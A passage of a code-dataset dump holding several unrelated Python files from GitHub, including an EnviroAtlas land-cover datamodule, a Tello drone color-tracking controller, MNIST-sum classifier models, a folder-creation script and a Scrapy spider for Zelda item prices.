sample[\"image\"].float()\n sample[\"image\"][: self.num_nlcd_layers] = (\n sample[\"image\"][: self.num_nlcd_layers] / 255.0\n )\n\n # handle reindexing the labels\n\n reindex_map = dict(zip(self.classes_keep, np.arange(len(self.classes_keep))))\n # reindex shrub to tree for learning the prior\n tree_idx = 3 # tree idx is 3 when there are no zeros\n shrub_idx = 5\n reindex_map[shrub_idx] = tree_idx\n reindexed_mask = -1 * torch.ones(sample[\"mask\"].shape)\n for old_idx, new_idx in reindex_map.items():\n reindexed_mask[sample[\"mask\"] == old_idx] = new_idx\n\n reindexed_mask[reindexed_mask == -1] = self.ignore_index\n assert (reindexed_mask >= 0).all()\n\n sample[\"mask\"] = reindexed_mask\n\n if self.onehot_encode_labels:\n sample[\"mask\"] = (\n nn.functional.one_hot(\n sample[\"mask\"].to(torch.int64), num_classes=self.n_classes\n )\n .transpose(0, 2)\n .transpose(1, 2)\n )\n\n sample[\"mask\"] = sample[\"mask\"].squeeze().long()\n \n del sample[\"bbox\"]\n \n return sample\n \n def nodata_check(\n self, size: int = 512\n ) -> Callable[[Dict[str, Tensor]], Dict[str, Tensor]]:\n \"\"\"Returns a function to check for nodata or mis-sized input.\n Args:\n size: output image size\n Returns:\n function to check for nodata values\n \"\"\"\n\n def nodata_check_inner(sample: Dict[str, Tensor]) -> Dict[str, Tensor]:\n num_channels, height, width = sample[\"image\"].shape\n\n if height < size or width < size:\n sample[\"image\"] = torch.zeros( # type: ignore[attr-defined]\n (num_channels, size, size)\n )\n sample[\"mask\"] = torch.zeros((size, size)) # type: ignore[attr-defined]\n\n return sample\n\n return nodata_check_inner\n\n def prepare_data(self) -> None:\n \"\"\"Confirms that the dataset is downloaded on the local node.\n\n This method is called once per node, while :func:`setup` is called once per GPU.\n \"\"\"\n EnviroAtlas(\n self.root_dir,\n splits=self.train_sets,\n layers=self.layers,\n prior_as_input=self.prior_as_input,\n transforms=None,\n download=False,\n checksum=False,\n )\n\n def setup(self, stage: Optional[str] = None) -> None:\n \"\"\"Create the train/val/test splits based on the original Dataset objects.\n\n The splits should be done here vs. in :func:`__init__` per the docs:\n https://pytorch-lightning.readthedocs.io/en/latest/extensions/datamodules.html#setup.\n \"\"\"\n train_transforms = Compose(\n [\n self.center_crop(self.patch_size),\n self.nodata_check(self.patch_size),\n self.preprocess,\n ]\n )\n val_transforms = Compose(\n [\n self.center_crop(self.patch_size),\n self.nodata_check(self.patch_size),\n self.preprocess,\n ]\n )\n test_transforms = Compose(\n [\n self.pad_to(self.original_patch_size, image_value=0, mask_value=11),\n self.preprocess,\n ]\n )\n\n print(\"training on \", self.train_sets)\n self.train_dataset = EnviroAtlas(\n self.root_dir,\n splits=self.train_sets,\n layers=self.layers,\n prior_as_input=self.prior_as_input,\n transforms=train_transforms,\n download=False,\n checksum=False,\n )\n self.val_dataset = EnviroAtlas(\n self.root_dir,\n splits=self.val_sets,\n layers=self.layers,\n prior_as_input=self.prior_as_input,\n transforms=val_transforms,\n download=False,\n checksum=False,\n )\n self.test_dataset = EnviroAtlas(\n self.root_dir,\n splits=self.test_sets,\n layers=self.layers,\n prior_as_input=self.prior_as_input,\n transforms=test_transforms,\n download=False,\n checksum=False,\n )\n\n def train_dataloader(self) -> DataLoader[Any]:\n \"\"\"Return a DataLoader for training.\n Returns:\n training data loader\n \"\"\"\n sampler = RandomBatchGeoSampler(\n self.train_dataset,\n size=self.original_patch_size,\n batch_size=self.batch_size,\n length=self.patches_per_tile * len(self.train_dataset),\n )\n return DataLoader(\n self.train_dataset,\n batch_sampler=sampler,\n num_workers=self.num_workers,\n collate_fn=stack_samples,\n )\n\n def val_dataloader(self) -> DataLoader[Any]:\n \"\"\"Return a DataLoader for validation.\n Returns:\n validation data loader\n \"\"\"\n sampler = GridGeoSampler(\n self.val_dataset,\n size=self.original_patch_size,\n stride=self.original_patch_size,\n )\n return DataLoader(\n self.val_dataset,\n batch_size=self.batch_size,\n sampler=sampler,\n num_workers=self.num_workers,\n collate_fn=stack_samples,\n shuffle=False\n )\n\n def test_dataloader(self) -> DataLoader[Any]:\n \"\"\"Return a DataLoader for testing.\n\n Returns:\n testing data loader\n \"\"\"\n sampler = GridGeoSampler(\n self.test_dataset,\n size=self.original_patch_size,\n stride=self.original_patch_size,\n )\n return DataLoader(\n self.test_dataset,\n batch_size=32,\n sampler=sampler,\n num_workers=self.num_workers,\n collate_fn=stack_samples,\n shuffle=False\n )","repo_name":"estherrolf/implicit-posterior","sub_path":"qr_for_landcover/datamodules/enviroatlas_learn_prior_datamodule.py","file_name":"enviroatlas_learn_prior_datamodule.py","file_ext":"py","file_size_in_byte":12766,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"7876207501","text":"import cv2\nimport pygame\nimport numpy as np\nimport time\n\nfrom djitellopy import Tello\nfrom pygame.locals import *\n\n\n#\n# 8888888 d8b 888 d8b 888 d8b 888 d8b\n# 888 Y8P 888 Y8P 888 Y8P 888 Y8P\n# 888 888 888 888\n# 888 88888b. 888 888888 888 8888b. 888 888 .d8888b 8888b. 888888 888 .d88b. 88888b.\n# 888 888 \"88b 888 888 888 \"88b 888 888 88K \"88b 888 888 d88\"\"88b 888 \"88b\n# 888 888 888 888 888 888 .d888888 888 888 \"Y8888b. .d888888 888 888 888 888 888 888\n# 888 888 888 888 Y88b. 888 888 888 888 888 X88 888 888 Y88b. 888 Y88..88P 888 888\n# 8888888 888 888 888 \"Y888 888 \"Y888888 888 888 88888P' \"Y888888 \"Y888 888 \"Y88P\" 888 888\n#\n\n\nclass FrontEnd(object):\n \"\"\" Maintains the Tello display and moves it through the keyboard keys.\n Press escape key to quit.\n The controls are:\n - Tab: Takeoff\n - Shift: Land\n - Space: Emergency Shutdown\n - WASD: Forward, backward, left and right\n - Q and E: Counter clockwise and clockwise rotations\n - R and F: Up and down\n - T: Start/Stop tracking\n - C: Select central pixel value as new color for tracking\n - #: Switch controllable parameter\n - + and -: Raise or Lower controllable parameter\n \"\"\"\n\n def __init__(self):\n # Init pygame\n pygame.init()\n\n # Init Tello object that interacts with the Tello drone\n self.tello = Tello()\n\n # general config\n self.internalSpeed = 100\n self.FPS = 20\n self.hud_size = (800, 600)\n\n\n # config of controllable parameters\n self.controll_params = {\n 'Speed': 100,\n 'Color': 0,\n }\n self.controll_params_d = {\n 'Speed': 10,\n 'Color': 1,\n }\n self.controll_params_m = {\n 'Speed': 100,\n 'Color': 2,\n }\n\n # tracker config\n self.color_lower = {\n 'blue': (100, 200, 50),\n 'red': (0, 200, 100),\n 'yellow': (20, 200, 130),\n }\n self.color_upper = {\n 'blue': (140, 255, 255),\n 'red': (20, 255, 255),\n 'yellow': (40, 255, 255),\n }\n\n self.current_color = np.array(self.color_lower['blue']) + np.array(self.color_upper['blue'])\n for i in range(0,3): self.current_color[i] = self.current_color[i] / 2\n self.crange = (10, 50, 50)\n\n # other params (no need to config)\n self.current_parameter = 0\n self.param_keys = list(self.controll_params.keys())\n self.color_keys = list(self.color_lower.keys())\n self.central_color = (0,0,0)\n self.midx = int(self.hud_size[0] / 2)\n self.midy = int(self.hud_size[1] / 2)\n self.xoffset = 0\n self.yoffset = 0\n self.target_radius = 120\n self.for_back_velocity = 0\n self.left_right_velocity = 0\n self.up_down_velocity = 0\n self.yaw_velocity = 0\n self.send_rc_control = False\n self.isTracking = False\n\n # Creat pygame window\n pygame.display.set_caption(\"Tello video stream\")\n self.screen = pygame.display.set_mode(self.hud_size)\n\n # create update timer\n pygame.time.set_timer(USEREVENT + 1, 50)\n\n\n#\n# 888b d888 d8b 888\n# 8888b d8888 Y8P 888\n# 88888b.d88888 888\n# 888Y88888P888 8888b. 888 88888b. 888 .d88b. .d88b. 88888b.\n# 888 Y888P 888 \"88b 888 888 \"88b 888 d88\"\"88b d88\"\"88b 888 \"88b\n# 888 Y8P 888 .d888888 888 888 888 888 888 888 888 888 888 888\n# 888 \" 888 888 888 888 888 888 888 Y88..88P Y88..88P 888 d88P\n# 888 888 \"Y888888 888 888 888 88888888 \"Y88P\" \"Y88P\" 88888P\"\n# 888\n# 888\n# 888\n#\n\n\n def run(self):\n \"\"\"\n Main loop.\n Contains reading the incoming frames, the call for tracking and basic keyboard stuff.\n \"\"\"\n\n if not self.tello.connect():\n print(\"Tello not connected\")\n return\n\n if not self.tello.set_speed(self.internalSpeed):\n print(\"Not set speed to lowest possible\")\n return\n\n # In case streaming is on. This happens when we quit this program without the escape key.\n if not self.tello.streamoff():\n print(\"Could not stop video stream\")\n return\n\n if not self.tello.streamon():\n print(\"Could not start video stream\")\n return\n\n frame_read = self.tello.get_frame_read()\n\n self.should_stop = False\n while not self.should_stop:\n\n # read frame\n img = cv2.cvtColor(frame_read.frame, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, self.hud_size, interpolation=cv2.INTER_AREA)\n\n # get output from tracking\n if self.isTracking:\n self.track(img)\n\n # produce hud\n self.frame = self.write_hud(img.copy())\n self.frame = np.fliplr(self.frame)\n self.frame = np.rot90(self.frame)\n self.frame = pygame.surfarray.make_surface(self.frame)\n self.screen.fill([0, 0, 0])\n self.screen.blit(self.frame, (0, 0))\n pygame.display.update()\n\n # handle input from dronet or user\n for event in pygame.event.get():\n if event.type == USEREVENT + 1:\n self.send_input()\n elif event.type == QUIT:\n self.should_stop = True\n elif event.type == KEYDOWN:\n if (event.key == K_ESCAPE) or (event.key == K_BACKSPACE):\n self.should_stop = True\n else:\n self.keydown(event.key)\n elif event.type == KEYUP:\n self.keyup(event.key)\n\n # shutdown stream\n if frame_read.stopped:\n frame_read.stop()\n break\n\n # wait a little\n time.sleep(1 / self.FPS)\n\n # always call before finishing to deallocate resources\n self.tello.end()\n\n\n def track(self, frame):\n \"\"\"\n HSV color space tracking.\n \"\"\"\n # resize the frame, blur it, and convert it to the HSV\n # color space\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_RGB2HSV)\n self.central_color = hsv[self.midy,self.midx,:]\n\n # construct a mask for the color then perform\n # a series of dilations and erosions to remove any small\n # blobs left in the mask\n mask = cv2.inRange(hsv, self.current_color - self.crange, self.current_color + self.crange)\n mask = cv2.erode(mask, None, iterations=3)\n mask = cv2.dilate(mask, None, iterations=3)\n\n # find contours in the mask and initialize the current\n # (x, y) center of the ball\n image, cnts, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\n center = None\n\n radius = 0\n velocity = 0\n # only proceed if at least one contour was found\n if len(cnts) > 0:\n # update color from mean color\n mask_upstate = cv2.bitwise_and(hsv, hsv, mask=mask)\n mean = cv2.mean(mask_upstate)\n multiplier = float(mask.size)/(cv2.countNonZero(mask)+0.001)\n mean = np.array([multiplier * x for x in mean])\n\n self.update_color(mean)\n print(self.current_color)\n\n # find the largest contour in the mask, then use\n # it to compute the minimum enclosing circle and\n # centroid\n c = max(cnts, key=cv2.contourArea)\n\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n # only proceed if the radius meets a minimum size\n if radius > 40:\n # draw the circle and centroid on the frame,\n # then update the list of tracked points\n cv2.circle(frame, (int(x), int(y)), int(radius),\n (0, 255, 0), 2)\n\n self.xoffset = int(center[0] - self.midx)\n self.yoffset = int(self.midy - center[1])\n velocity = clamp(self.target_radius - radius, -40, 60) / 100 * self.controll_params['Speed']\n else:\n self.xoffset = 0\n self.yoffset = 0\n velocity = 0\n else:\n self.xoffset = 0\n self.yoffset = 0\n velocity = 0\n\n xfact = self.xoffset / self.hud_size[0] * self.controll_params['Speed'] * 2\n yfact = self.yoffset / self.hud_size[0] * self.controll_params['Speed'] * 2\n\n self.for_back_velocity = int(velocity)\n self.yaw_velocity = int(xfact)\n self.up_down_velocity = int(yfact)\n\n\n#\n# 8888888 888 888b d888 888 888 888\n# 888 888 8888b d8888 888 888 888\n# 888 888 88888b.d88888 888 888 888\n# 888 88888b. 88888b. 888 888 888888 888Y88888P888 .d88b. 888888 88888b. .d88b. .d88888 .d8888b\n# 888 888 \"88b 888 \"88b 888 888 888 888 Y888P 888 d8P Y8b 888 888 \"88b d88\"\"88b d88\" 888 88K\n# 888 888 888 888 888 888 888 888 888 Y8P 888 88888888 888 888 888 888 888 888 888 \"Y8888b.\n# 888 888 888 888 d88P Y88b 888 Y88b. 888 \" 888 Y8b. Y88b. 888 888 Y88..88P Y88b 888 X88\n# 8888888 888 888 88888P\" \"Y88888 \"Y888 888 888 \"Y8888 \"Y888 888 888 \"Y88P\" \"Y88888 88888P'\n# 888\n# 888\n# 888\n#\n\n\n def keydown(self, key):\n \"\"\" Update velocities based on key pressed\n Arguments:\n key: pygame key\n \"\"\"\n if key == pygame.K_w: # set forward velocity\n self.isTracking = False\n self.for_back_velocity = self.controll_params['Speed']\n elif key == pygame.K_s: # set backward velocity\n self.isTracking = False\n self.for_back_velocity = -self.controll_params['Speed']\n elif key == pygame.K_a: # set left velocity\n self.isTracking = False\n self.left_right_velocity = -self.controll_params['Speed']\n elif key == pygame.K_d: # set right velocity\n self.isTracking = False\n self.left_right_velocity = self.controll_params['Speed']\n elif key == pygame.K_r: # set up velocity\n self.isTracking = False\n self.up_down_velocity = self.controll_params['Speed']\n elif key == pygame.K_f: # set down velocity\n self.isTracking = False\n self.up_down_velocity = -self.controll_params['Speed']\n elif key == pygame.K_e: # set yaw clockwise velocity\n self.isTracking = False\n self.yaw_velocity = self.controll_params['Speed']\n elif key == pygame.K_q: # set yaw counter clockwise velocity\n self.isTracking = False\n self.yaw_velocity = -self.controll_params['Speed']\n elif key == pygame.K_TAB: # takeoff\n self.tello.takeoff()\n self.send_rc_control = True\n elif key == pygame.K_LSHIFT: # land\n self.isTracking = False\n self.tello.land()\n self.send_rc_control = False\n elif key == pygame.K_SPACE: # emergency shutdown\n self.isTracking = False\n self.tello.emergency()\n self.send_rc_control = False\n self.should_stop = True\n elif key == pygame.K_BACKSPACE: # emergency shutdown\n self.isTracking = False\n self.send_rc_control = False\n self.should_stop = True\n elif key == pygame.K_t: # arm tracking\n self.isTracking = not self.isTracking\n self.for_back_velocity = 0\n self.yaw_velocity = 0\n self.up_down_velocity = 0\n elif key == pygame.K_c: # get new color\n self.set_color(self.central_color)\n self.for_back_velocity = 0\n self.yaw_velocity = 0\n self.up_down_velocity = 0\n elif key == pygame.K_HASH: # switch parameters\n if self.current_parameter == 0:\n self.current_parameter = 1\n else:\n self.current_parameter = 0\n elif key == pygame.K_PLUS: # raise current parameter\n what = self.param_keys[self.current_parameter]\n if self.controll_params[what] < self.controll_params_m[what] - 0.01:\n self.controll_params[what] = self.controll_params[what] + self.controll_params_d[what]\n if (what == 'Color'):\n self.reset_color()\n elif key == pygame.K_MINUS: # lower current parameter\n what = self.param_keys[self.current_parameter]\n if self.controll_params[what] > 0.01:\n self.controll_params[what] = self.controll_params[what] - self.controll_params_d[what]\n if (what == 'Color'):\n self.reset_color()\n\n\n def keyup(self, key):\n \"\"\" Update velocities based on key released\n Arguments:\n key: pygame key\n \"\"\"\n if key == pygame.K_w or key == pygame.K_s: # set zero forward/backward velocity\n self.for_back_velocity = 0\n elif key == pygame.K_a or key == pygame.K_d: # set zero left/right velocity\n self.left_right_velocity = 0\n elif key == pygame.K_r or key == pygame.K_f: # set zero up/down velocity\n self.up_down_velocity = 0\n elif key == pygame.K_q or key == pygame.K_e: # set zero yaw velocity\n self.yaw_velocity = 0\n\n\n def send_input(self):\n \"\"\" Update routine. Send velocities to Tello.\"\"\"\n #print(\"V: \" + str(self.for_back_velocity) + \"; Y: \" + str(self.yaw_velocity))\n if self.send_rc_control:\n self.tello.send_rc_control(self.left_right_velocity, self.for_back_velocity, self.up_down_velocity,\n self.yaw_velocity)\n\n\n#\n# 888 888 888 888b d888 888 888 888\n# 888 888 888 8888b d8888 888 888 888\n# 888 888 888 88888b.d88888 888 888 888\n# 8888888888 .d88b. 888 88888b. .d88b. 888d888 888Y88888P888 .d88b. 888888 88888b. .d88b. .d88888 .d8888b\n# 888 888 d8P Y8b 888 888 \"88b d8P Y8b 888P\" 888 Y888P 888 d8P Y8b 888 888 \"88b d88\"\"88b d88\" 888 88K\n# 888 888 88888888 888 888 888 88888888 888 888 Y8P 888 88888888 888 888 888 888 888 888 888 \"Y8888b.\n# 888 888 Y8b. 888 888 d88P Y8b. 888 888 \" 888 Y8b. Y88b. 888 888 Y88..88P Y88b 888 X88\n# 888 888 \"Y8888 888 88888P\" \"Y8888 888 888 888 \"Y8888 \"Y888 888 888 \"Y88P\" \"Y88888 88888P'\n# 888\n# 888\n# 888\n#\n\n\n def update_color(self, val):\n \"\"\"\n Adjusts the currently tracked color to input.\n \"\"\"\n if (cv2.mean(val) != 0):\n for i in range(0,2):\n self.current_color[i] = clamp(val[i],\n self.color_lower[self.color_keys[self.controll_params['Color']]][i],\n self.color_upper[self.color_keys[self.controll_params['Color']]][i])\n\n def set_color(self, val):\n self.current_color = np.array(val)\n print(val)\n\n def reset_color(self):\n self.current_color = np.array(self.color_lower[self.color_keys[self.controll_params['Color']]]) + np.array(self.color_upper[self.color_keys[self.controll_params['Color']]])\n for i in range(0,3): self.current_color[i] = self.current_color[i] / 2\n\n def write_hud(self, frame):\n \"\"\"Draw drone info and record on frame\"\"\"\n stats = [\"TelloTracker\"]\n if self.isTracking:\n stats.append(\"Tracking active.\")\n stats.append(\"Speed: {:03d}\".format(self.controll_params['Speed']))\n stats.append(\"Color: \" + self.color_keys[self.controll_params['Color']])\n self.draw_arrows(frame)\n else:\n stats.append(\"Tracking disabled.\")\n img = cv2.circle(frame, (self.midx, self.midy), 10, (0,0,255), 1)\n\n stats.append(self.param_keys[self.current_parameter] + \": {:4.1f}\".format(self.controll_params[self.param_keys[self.current_parameter]]))\n for idx, stat in enumerate(stats):\n text = stat.lstrip()\n cv2.putText(frame, text, (0, 30 + (idx * 30)),\n cv2.FONT_HERSHEY_SIMPLEX,\n 1.0, (255, 0, 0), lineType=30)\n return frame\n\n def draw_arrows(self, frame):\n \"\"\"Show the direction vector output in the cv2 window\"\"\"\n #cv2.putText(frame,\"Color:\", (0, 35), cv2.FONT_HERSHEY_SIMPLEX, 1, 255, thickness=2)\n cv2.arrowedLine(frame, (self.midx, self.midy),\n (self.midx + self.xoffset, self.midy - self.yoffset),\n (255, 0, 0), 5)\n return frame\n\ndef clamp(n, smallest, largest): return max(smallest, min(n, largest))\n\ndef main():\n frontend = FrontEnd()\n\n # run frontend\n frontend.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nfinitedesign/tello-color-tracking","sub_path":"tellotracker.py","file_name":"tellotracker.py","file_ext":"py","file_size_in_byte":18593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5668344189","text":"import numpy\nimport numpy as np\nfrom util import softmax\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nimport time\n\n\n# Authors: Guillaume Gagné-Labelle, Yann Saah, Giovanni Belval\n# Date: Oct 2022\n# Project: Kaggle Competition - IFT3395\n# Description: Classification of the sum of 2 MNIST images\n\nclass logistic:\n def __init__(self, args):\n self.W = np.random.normal(size=(28 * 28, 10)) # num_classes = 10, dimension = 28x28\n self.b = np.zeros(10)\n self.lr = args.lr\n self.decay = args.decay\n\n # predict a label out of a probability distribution computed by a logistic regression from an image\n # input: batch of pairs of images: [batch_size, 2, 28, 28]\n # output: batch of probabilities for both images: [batch_size, 10], [batch_size, 10]\n # batch of labels: [batch_size]\n def prediction(self, images):\n B = images.shape[0] # batch size\n image1 = images[:, 0, :, :].reshape(B, -1)\n image2 = images[:, 1, :, :].reshape(B, -1)\n\n prob1 = softmax(np.matmul(self.W.transpose(), image1[:, :, np.newaxis]).squeeze() + self.b) # W_t X1 + b\n prob2 = softmax(np.matmul(self.W.transpose(), image2[:, :, np.newaxis]).squeeze() + self.b) # W_t X2 + b\n\n prob = np.zeros((B, 19))\n for b in range(B):\n for k in range(19):\n for i in range(10):\n if 0 <= k - i < 10: prob[b, k] += prob1[b, i] * prob2[b, k - i]\n\n pred = np.argmax(prob, axis=1)\n\n return pred, prob, prob1, prob2\n\n\n def update(self, images, prob, prob1, prob2, labels):\n B = images.shape[0]\n image1 = images[:, 0, :, :].reshape(B, -1)\n image2 = images[:, 1, :, :].reshape(B, -1)\n\n grad_W = np.zeros_like(self.W)\n grad_b = np.zeros_like(self.b)\n for N in range(B):\n for i in range(10):\n if i != labels[N]: continue\n A = - 1 / prob[N, i]\n for k in range(i):\n B1 = prob2[N, i - k]\n B2 = prob1[N, i - k]\n for m in range(10):\n if k == m:\n C1 = prob1[N, k] * (1 - prob1[N, k])\n C2 = prob2[N, k] * (1 - prob2[N, k])\n else:\n C1 = - prob1[N, k] * prob2[N, m]\n C2 = - prob2[N, k] * prob2[N, m]\n\n grad_b[m] += A * (B1*C1 + B2*C2)\n for n in range(28 * 28):\n D1 = image1[N, n]\n D2 = image2[N, n]\n grad_W[n][m] += A * (B1*C1*D1 + B2*C2*D2)\n\n self.W -= (self.lr * grad_W / B + 2e-4 * self.W) # lambda = 1e-4 (Ridge)\n self.b -= self.lr * grad_b / B\n\n\nclass InferenceModel(nn.Module):\n def __init__(self, in_dim):\n super().__init__()\n\n self.pred = get_enc(in_dim)\n self.cls = nn.Sequential(nn.Linear(128, 19)) # not softmaxed\n\n def forward(self, d_x):\n pred = self.pred(d_x)\n pred = self.cls(pred)\n return pred\n\n\ndef get_enc(in_dim):\n enc_sz = 256\n return nn.Sequential(\n nn.Conv2d(in_dim[0], 32, kernel_size=3, stride=1, padding=1, bias=True),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n\n nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1, bias=True),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n\n nn.MaxPool2d(2, 2), # 14, 28\n nn.Flatten(start_dim=1),\n nn.Linear(64 * 14 * 28, enc_sz),\n nn.BatchNorm1d(enc_sz),\n\n nn.ReLU(),\n nn.Linear(enc_sz, 128),\n nn.BatchNorm1d(128),\n )\n\n\n# Defining the convolutional neural network\nclass LeNet5(nn.Module):\n def __init__(self, num_classes):\n super(LeNet5, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 6, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2)) # 14,28\n self.layer2 = nn.Sequential(\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2)) # 7, 14\n self.fc = nn.Linear(704, 120)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(84, num_classes)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n out = self.relu(out)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n return out\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n\n # define a conv layer with output channels as 16, kernel size of 3 and stride of 1\n self.conv11 = nn.Conv2d(1, 16, (3, 5), 1) # Input = 1x28x56 Output = 16x26x52\n self.conv12 = nn.Conv2d(1, 16, (5, 9), 1) # Input = 1x28x56 Output = 16x24x48\n self.conv13 = nn.Conv2d(1, 16, (7, 13), 1) # Input = 1x28x56 Output = 16x22x44\n self.conv14 = nn.Conv2d(1, 16, (9, 17), 1) # Input = 1x28x56 Output = 16x20x40\n\n # define a conv layer with output channels as 32, kernel size of 3 and stride of 1\n self.conv21 = nn.Conv2d(16, 32, (3, 5), 1) # Input = 16x26x52 Output = 32x24x48\n self.conv22 = nn.Conv2d(16, 32, (5, 9), 1) # Input = 16x24x48 Output = 32x20x40\n self.conv23 = nn.Conv2d(16, 32, (7, 13), 1) # Input = 16x22x44 Output = 32x16x32\n self.conv24 = nn.Conv2d(16, 32, (9, 17), 1) # Input = 16x20x40 Output = 32x12x24\n\n # define a conv layer with output channels as 64, kernel size of 3 and stride of 1\n self.conv31 = nn.Conv2d(32, 64, (3, 5), 1) # Input = 32x24x48 Output = 64x22x44\n self.conv32 = nn.Conv2d(32, 64, (5, 9), 1) # Input = 32x20x40 Output = 64x16x32\n self.conv33 = nn.Conv2d(32, 64, (7, 13), 1) # Input = 32x16x32 Output = 64x10x20\n self.conv34 = nn.Conv2d(32, 64, (9, 17), 1) # Input = 32x12x24 Output = 64x4x8\n\n # define a max pooling layer with kernel size 2\n self.maxpool = nn.MaxPool2d(2) # Output = 64x11x22\n # self.maxpool1 = nn.MaxPool2d(1)\n # define dropout layer with a probability of 0.25\n self.dropout1 = nn.Dropout(0.25)\n # define dropout layer with a probability of 0.5\n self.dropout2 = nn.Dropout(0.5)\n\n # define a linear(dense) layer with 128 output features\n self.fc11 = nn.Linear(64 * 11 * 22, 256)\n self.fc12 = nn.Linear(64 * 8 * 16, 256) # after maxpooling 2x2\n self.fc13 = nn.Linear(64 * 5 * 10, 256)\n self.fc14 = nn.Linear(64 * 2 * 4, 256)\n\n # define a linear(dense) layer with output features corresponding to the number of classes in the dataset\n self.fc21 = nn.Linear(256, 128)\n self.fc22 = nn.Linear(256, 128)\n self.fc23 = nn.Linear(256, 128)\n self.fc24 = nn.Linear(256, 128)\n\n self.fc33 = nn.Linear(128 * 4, 19)\n\n def forward(self, inp):\n # Use the layers defined above in a sequential way (follow the same as the layer definitions above) and\n # write the forward pass, after each of conv1, conv2, conv3 and fc1 use a relu activation.\n\n x = F.relu(self.conv11(inp))\n x = F.relu(self.conv21(x))\n x = F.relu(self.maxpool(self.conv31(x)))\n # print(x.shape)\n # x = torch.flatten(x, 1)\n x = x.view(-1, 64 * 11 * 22)\n x = self.dropout1(x)\n x = F.relu(self.fc11(x))\n x = self.dropout2(x)\n x = self.fc21(x)\n\n y = F.relu(self.conv12(inp))\n y = F.relu(self.conv22(y))\n y = F.relu(self.maxpool(self.conv32(y)))\n # x = torch.flatten(x, 1)\n y = y.view(-1, 64 * 8 * 16)\n y = self.dropout1(y)\n y = F.relu(self.fc12(y))\n y = self.dropout2(y)\n y = self.fc22(y)\n\n z = F.relu(self.conv13(inp))\n z = F.relu(self.conv23(z))\n z = F.relu(self.maxpool(self.conv33(z)))\n # x = torch.flatten(x, 1)\n z = z.view(-1, 64 * 5 * 10)\n z = self.dropout1(z)\n z = F.relu(self.fc13(z))\n z = self.dropout2(z)\n z = self.fc23(z)\n\n ze = F.relu(self.conv14(inp))\n ze = F.relu(self.conv24(ze))\n ze = F.relu(self.maxpool(self.conv34(ze)))\n # x = torch.flatten(x, 1)\n ze = ze.view(-1, 64 * 2 * 4)\n ze = self.dropout1(ze)\n ze = F.relu(self.fc14(ze))\n ze = self.dropout2(ze)\n ze = self.fc24(ze)\n\n out_f = torch.cat((x, y, z, ze), dim=1)\n # out_f1 = torch.cat((out_f, ze), dim=1)\n out = self.fc33(out_f)\n\n output = F.log_softmax(out, dim=1)\n return out\n","repo_name":"guillaume-gagnelabelle/kaggle_mnist","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71268458934","text":"from pathlib import Path\n\nsource_path = Path(__file__).resolve() \ntarget_path = source_path.parent / \"data\"\n\nd = {\"Films\": [\"Le seigneur des anneaux\",\n \"Harry Potter\",\n \"Moon\",\n \"Forrest Gump\"],\n \"Employes\": [\"Paul\",\n \"Pierre\",\n \"Marie\"],\n \"Exercices\": [\"les_variables\",\n \"les_fichiers\",\n \"les_boucles\"]}\n\nfor parent_folder, inner_folders in d.items():\n for inner_folder in inner_folders:\n folder_path = target_path / parent_folder / inner_folder\n folder_path.mkdir(exist_ok=True, parents=True)","repo_name":"aurechabnv/training-python","sub_path":"structure-de-dossiers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10827917518","text":"\"\"\"crawl/crawl/spiders/zelda_items.py\"\"\"\nfrom scrapy import Request, Spider\n\n\nclass ZeldaItemsSpider(Spider):\n \"\"\"\n Defines the ZeldaItemsSpider\n \"\"\"\n\n name = \"zelda_items\"\n base_url = \"http://zelda.gamepedia.com\"\n allowed_domains = [\"zelda.gamepedia.com\"]\n start_urls = [f\"{base_url}/Items_in_The_Legend_of_Zelda\"]\n\n def parse(self, response):\n \"\"\"\n Retrieve the links to the items\n \"\"\"\n selector = \"li.gallerybox .gallerytext p a::attr(href)\"\n for href in response.css(selector).extract():\n yield Request(f\"{self.base_url}{href}\", callback=self.parse_item)\n\n def parse_item(self, response):\n \"\"\"\n Retrieve the item details\n \"\"\"\n name_sel = \"meta[property='og:title']::attr(content)\"\n price_sel = \"//tr[th//text()[contains(., 'Cost(s)')]]/td/div/text()\"\n name = response.css(name_sel).get()\n price = response.xpath(price_sel).get()\n if price and price.strip().isdigit():\n yield {\"name\": name, \"price\": int(price)}\n","repo_name":"jitsejan/architecture-patterns-with-python","sub_path":"data-retrieval/crawl/spiders/zelda_items.py","file_name":"zelda_items.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"1678474232","text":"while True:\r\n name, age, weight = input().split(' ')\r\n age, weight = int(age), int(weight)\r\n\r\n if name == '#' and age == 0 and weight == 0:\r\n 